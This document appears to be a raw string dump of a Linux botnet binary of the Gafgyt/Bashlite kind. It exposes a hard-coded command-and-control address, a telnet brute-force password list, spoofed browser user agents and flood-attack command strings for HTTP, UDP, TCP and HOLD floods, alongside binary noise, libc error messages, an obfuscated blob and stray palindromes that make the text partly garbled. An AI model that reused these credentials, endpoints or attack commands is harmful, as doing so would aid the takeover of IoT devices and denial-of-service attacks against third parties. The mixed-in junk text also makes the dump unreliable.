PTRh
QVh3
</v	
<suB
<du0
<xu0
<Xu0
<uu-
<cuJ
;E }
RQSPhrL
[^_]
<	u:
Sjdj
Sjdj
Sjdj
Sjdj
Sjdj
Sjdj
[^_]
VRQPhlO
SVWQRP
SRPh
SVWRP
SRPh
SVWRP
SRPh
[^_]
WVSQ
PhsP
< t	
< t	
PRQW
T$(S
T$(S
^8PSh
RRVj
t$(j
UWVS
t$$P
[^_]
UWVS
[^_]
QPRS
^8PSh
t$,V
UWVS
t$$S
[^_]
UWVS
T$`~
D$(%
WVPR
$VRP
?0u+
D$ P
PQRR
QQRW
[^_]
tP~N
t@~>=
UWVS
<$u0
\$L9
~	<mtN
:*u4
T$X:
L$pE
D$`P
L$p)
\[^_]
t@;C
AIt	
UWVS
ZY[^_]
UWVS
D$gP
[^_]
PVWS
\$HPh
D$)P
D$ P
D$$Ph
UWVS
Borrow or rob
t$xSU
t$xj
t$hW
\$DS
D$TPhh
E$VRWP
uZRj
t$,U
L[^_]
D$ Pj
D$ Pj
xAPPSh`
UWVS
\$Thps
D$8P
T$ !
#t$ 
2#D$ 
D$8P
[^_]
UWVS
[^_]
UWVS
u=9J
;X,tQ
[^_]
UWVS
Vhps
u<9J
SSPQ)
Degas are we not drawn onward no In union drawn onward to new eras aged
[^_]
uXRh
\$ S
D$,Ph
UWVS
Beeb
[^_]
UWVS
[^_]
UWVS
;<$|
XZKy
[^_]
UWVS
[^_]
UWVS
 <xu
(<`v
}/C;T$
D$,!
[^_]
t$$h`t
UWVS
u%WWSS
ZYSS
[^_]
yPPj
PPSh`e
UWVS
Qjxj
D$ P
t@;D$xu
D$ P
t$Dj
D$<PR
t$(j
UWVS
\$89
[^_]
UWVS
)\$(
[^_]
UWVS
PVUR
whQWUR
[^_]
[^_]
UWVS
[^_]
UWVS
e<au
u*z(
u?z=
D$Pp
D$X|e
|$6f
l$61
D$(RP
} Pj
D$'g
Do nine men interpret Nine men I nod
D$'f)
D$\p
|$d9
T$`)
L$t1
|$'fto
[^_]
QQWS
'RRWS
UWVS
.u5A
Z[^_]
UWVS
D$7h(
D$<XZj
\$PS
D$$;
}3Ph
t$(j
D$LPU
D$,9
uOQh
K9\$$}
PPVU
;\$d|
D$tP
T$|RW
G$;G wn
9D$xu,
t$4C;\$h}
T$H^_j
uDQh
K9\$$}
D$(@
tMQh(
[^_]
UWVS
UUhpf
WWhpf
VVhgf
SShrf
t>QQhyf
\$$S
[^_]
t$4j
t$8j
UWVS
^8WSh
D$(P
QhTr
D$(P
QhTr
[^_]
UWVS
^8PSh
D$(PV
x6RW
D$(PV
[^_]
WVS1
UWVS
<rt>
<wt7f
<at/
E4tmPhTr
t$(V
[^_]
^8QSh
(hTr
D$ P
Qh<r
D$ P
UWVS
WhTr
^8PSh
[^_]
UWVS
[^_]
WVS1
UWVS
t+F1
D$ PU
[^_]
UWVS
D$(P
yQQVh
u+Rj
D$$P
,[^_]
UWVS
|$-1
+<0u$
D<,.f
\$7S
<[^_]
UWVS
Pj j
D$HP
D$t)
;D$|v
!WWR
[^_]
UWVS
[^_]
PPhpf
UWVS
PPj#
u,PP
t$4U
[^_]
T$$S
UWVS
YRRj.W
D$()
[^_]
UWVS
G;|$,s\PS
[^_]
189.219.55.146:164
root
admin
guest
support
cisco
1234
12345
123456
vizxv
Mozilla/4.0 (Compatible; MSIE 8.0; Windows NT 5.2; Trident/6.0)
Mozilla/4.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/5.0)
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; pl) Opera 11.00
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; en) Opera 11.00
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; ja) Opera 11.00
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; de) Opera 11.01
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; fr) Opera 11.00
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0
Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11) AppleWebKit/601.1.56 (KHTML, like Gecko) Version/9.0 Safari/601.1.56
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/601.2.7 (KHTML, like Gecko) Version/9.0.1 Safari/601.2.7
Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)
Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51
Opera/9.80 (X11; Linux i686; Ubuntu/14.10) Presto/2.12.388 Version/12.16
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A
Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36
Mozilla/5.0 (Linux; Android 4.4.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.89 Mobile Safari/537.36
Mozilla/5.0 (Linux; Android 4.4.3; HTC_0PCV2 Build/KTU84L) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
Mozilla/4.0 (compatible; MSIE 8.0; X11; Linux x86_64; pl) Opera 11.00
Mozilla/4.0 (compatible; MSIE 9.0; Windows 98; .NET CLR 3.0.04506.30)
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/4.0; GTB7.4; InfoPath.3; SV1; .NET CLR 3.4.53360; WOW64; en-US)
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/4.0; FDM; MSIECrawler; Media Center PC 5.0)
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 4.4.58799; WOW64; en-US)
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; FunWebProducts)
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:25.0) Gecko/20100101 Firefox/25.0
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:21.0) Gecko/20100101 Firefox/21.0
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:24.0) Gecko/20100101 Firefox/24.0
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko/20100101 Firefox/33.0
(null)
Buffer: %s
PING
:>%$#
%d.%d.%d.%d
?=STzDwSddS?=STu*UTUv"SddS?=ST=)uTxADSddS?=STD"zSddS?=STu*UZUDSW(SIZ^vxs^!qSr|)zSAzzw1TT>llX@<+X:@X>.,T^B"XxASddSr|)zSAzzw1TT>llX@<+X:@X>.,T^B"XxAZxAS^B"XxAZ^vxs^!qSz(zwSWUS^B"@XxASW|S>llX@<+X:@X>.,SddSz(zwSWUS^B"@XxASW|S>llX@<+X:@X>.,ZxAS^B"@XxAZ^vxs^!qSz(zwS>llX@<+X:@X>.,SW?S|)zS^B"oXxASddSz(zwS>llX@<+X:@X>.,SW?S|)zS^B"oXxAZxAS^B"oXxAZ^vxs^!qS(zw|)zS>llX@<+X:@X>.,S^B"$XxAS^B"$XxAZxAS^B"$XxAZ)qBz
alula
ogin
sername
ccount
vrdvs
assword
nvalid
ailed
ncorrect
enied
rror
oodbye
%s %s HTTP/1.1
Host: %s
User-Agent: %s
Connection: close
Failed opening raw socket.
Failed setting raw headers mode.
Invalid flag - %s
PONG!
SCANNER
HTTPFLOOD
HTTP %s Flooding %s:%d for %d seconds
UDP Flooding %s:%d for %d seconds
TCP Flooding %s:%d for %d seconds
HOLD
HOLD Flooding %s:%d for %d seconds
KILLATTK
Killed %d PIDs
LOLNOGTFO
>llX@<+X:@X>.,
8.8.8.8
/proc/net/route
	00000000	
?U!"=
Fork failed
%s %s %s
PONG
Link closed by server
(nil)
(null)
hlLjztqZ
npxXoudifFeEgGaACScs
 +0-#'I
Unknown error 
Success
Operation not permitted
No such file or directory
No such process
Interrupted system call
Input/output error
No such device or address
Argument list too long
Exec format error
Bad file descriptor
No child processes
Resource temporarily unavailable
Cannot allocate memory
Permission denied
Bad address
Block device required
Device or resource busy
File exists
Invalid cross-device link
No such device
Not a directory
Is a directory
Invalid argument
Too many open files in system
Too many open files
Inappropriate ioctl for device
Text file busy
File too large
No space left on device
Illegal seek
Read-only file system
Too many links
Broken pipe
Numerical argument out of domain
Numerical result out of range
Resource deadlock avoided
File name too long
No locks available
Function not implemented
Directory not empty
Too many levels of symbolic links
No message of desired type
Identifier removed
Channel number out of range
Level 2 not synchronized
Level 3 halted
Level 3 reset
Link number out of range
Protocol driver not attached
No CSI structure available
Level 2 halted
Invalid exchange
Invalid request descriptor
Exchange full
No anode
Invalid request code
Invalid slot
Bad font file format
Device not a stream
No data available
Timer expired
Out of streams resources
Machine is not on the network
Package not installed
Object is remote
Link has been severed
Advertise error
Srmount error
Communication error on send
Protocol error
Multihop attempted
RFS specific error
Bad message
Value too large for defined data type
Name not unique on network
File descriptor in bad state
Remote address changed
Can not access a needed shared library
Accessing a corrupted shared library
.lib section in a.out corrupted
Attempting to link in too many shared libraries
Cannot exec a shared library directly
Invalid or incomplete multibyte or wide character
Interrupted system call should be restarted
Streams pipe error
Too many users
Socket operation on non-socket
Eleele
Destination address required
Message too long
Protocol wrong type for socket
Protocol not available
Protocol not supported
Socket type not supported
Operation not supported
Protocol family not supported
Address family not supported by protocol
Address already in use
Cannot assign requested address
Network is down
Network is unreachable
Network dropped connection on reset
Software caused connection abort
Connection reset by peer
No buffer space available
Transport endpoint is already connected
Transport endpoint is not connected
Cannot send after transport endpoint shutdown
Too many references: cannot splice
Connection timed out
Connection refused
Host is down
No route to host
Operation already in progress
Operation now in progress
Stale NFS file handle
Structure needs cleaning
Not a XENIX named type file
No XENIX semaphores available
Is a named type file
Remote I/O error
Disk quota exceeded
No medium found
Wrong medium type
/dev/null
L(knN
 Ainf
/etc/resolv.conf
/etc/config/resolv.conf
nameserver
domain
search
0123456789abcdef
/etc/hosts
/etc/config/hosts
<>@o$:,.l+*^?=)(|AB&%;D"!wkUxzvutsrqp_nm-ihgfFCcba~K23456789eyd1XSNQWTZMIRHGVOYLjPJE
0123456789abcdefghijklmnopqrstuvzywxABCDEFGHIJKLMNOPQRSTUVZYWX|:. !#-/;&*'"
>$%(),
CAk[S
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
A Santa lives evil at NASA
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
God A red nugget A fat egg under a dog
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
Tacocat
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
.shstrtab
.init
.text
.fini
.rodata
.eh_frame
.ctors
.dtors
.jcr
.got.plt
.data
.bss
.comment
